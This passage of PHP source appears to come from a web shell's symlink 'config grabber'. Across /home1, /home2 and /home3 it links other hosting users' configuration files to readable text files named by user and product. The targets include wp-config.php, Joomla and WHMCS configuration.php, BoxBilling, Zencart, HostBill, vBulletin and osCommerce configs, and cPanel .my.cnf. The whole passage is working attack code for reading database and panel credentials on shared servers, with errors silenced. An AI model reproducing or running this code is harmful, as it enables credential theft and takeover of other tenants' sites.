  1067. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1068. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1069. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1070. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1071. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1072. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1073. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1074. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1075. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1076. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1077. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1078. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1079. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1080. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1081. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1082. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1083. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1084. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1085. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1086. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1087. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1088. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1089. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1090. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1091. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1092. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1093. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1094. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1095. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1096. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1097. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1098. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1099. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1100. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1101. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1102. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1103. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1104. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1105. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1106. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1107. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1108. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1109. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1110. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1111. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1112. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1113. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1114. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1115. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1116. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1117. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1118. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1119. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1120. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1121. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1122. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1123. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1124. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1125. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1126. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1127. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1128. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1129. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1130. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1131. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1132. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1133. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1134. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1135. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1136. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1137. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1138. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1139. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1140. @symlink('/home1/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1141. @symlink('/home1/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1142. //Home2
  1143.  
  1144. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1145. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1146. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1147. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1148. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1149. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1150. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1151. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1152. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1153. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1154. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1155. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1156. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1157. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1158. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1159. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1160. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1161. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1162. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1163. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1164. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1165. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1166. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1167. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1168. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1169. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1170. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1171. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1172. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1173. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1174. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1175. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1176. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1177. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1178. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1179. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1180. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1181. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1182. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1183. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1184. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1185. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1186. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1187. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1188. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1189. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1190. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1191. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1221. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1222. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1223. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1224. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1225. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1226. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1227. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1228. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1229. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1230. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1231. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1232. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1233. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1234. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1235. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1236. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1237. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1238. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1239. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1240. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1241. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1242. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1243. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1244. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1245. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1246. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1247. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1248. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1249. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1250. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1251. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1252. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1253. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1254. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1255. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1256. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1257. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1258. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1259. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1260. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1261. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1262. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1263. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1264. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1265. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1266. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1267. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1268. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1269. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1270. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1271. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1272. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1273. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1274. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1275. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1276. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1277. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1278. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1279. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1280. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1281. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1282. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1283. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1284. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1285. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1286. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1287. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1288. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1289. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1290. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1291. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1292. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1293. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1294. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1295. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1296. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1297. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1298. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1299. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1300. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1301. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1302. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1303. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1304. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1305. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1306. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1307. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1308. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1309. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1310. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1311. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1312. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1313. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1314. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1315. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1316. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1317. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1318. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1319. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1320. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1321. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1322. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1323. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1324. @symlink('/home2/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1325. @symlink('/home2/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1326. //Home3
  1327.  
  1328. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1329. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1330. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1331. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1332. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1333. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1334. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1335. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1336. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1337. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1338. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1339. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1340. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1341. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1342. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1343. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1344. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1345. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1346. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1347. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1348. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1349. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1350. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1351. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1352. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1353. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1354. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1355. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1356. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1357. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1358. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1359. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1360. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1361. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1362. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1363. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1364. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1365. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1366. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1367. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1368. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1369. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1370. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1371. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1372. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1373. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
